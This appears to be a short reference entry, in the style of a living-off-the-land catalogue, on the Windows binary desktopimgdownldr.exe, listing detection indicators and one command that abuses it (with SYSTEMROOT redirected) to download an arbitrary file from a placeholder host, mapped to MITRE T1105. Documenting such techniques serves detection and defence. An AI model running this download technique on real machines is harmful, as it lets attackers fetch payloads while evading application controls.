.. / Desktopimgdownldr.exe
Star

Windows binary used to configure lockscreen/desktop image


Paths:


Resources:
https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/

Acknowledgement:
Gal Kristal - @gal_kristal


Detection:
desktopimgdownldr.exe that creates non-image file
Change of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP\LockScreenImageUrl



Download

Downloads the file and sets it as the computer's lockscreen
set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
Usecase:Download arbitrary files from a web server
Privileges required:User
OS:Windows 10
Mitre:T1105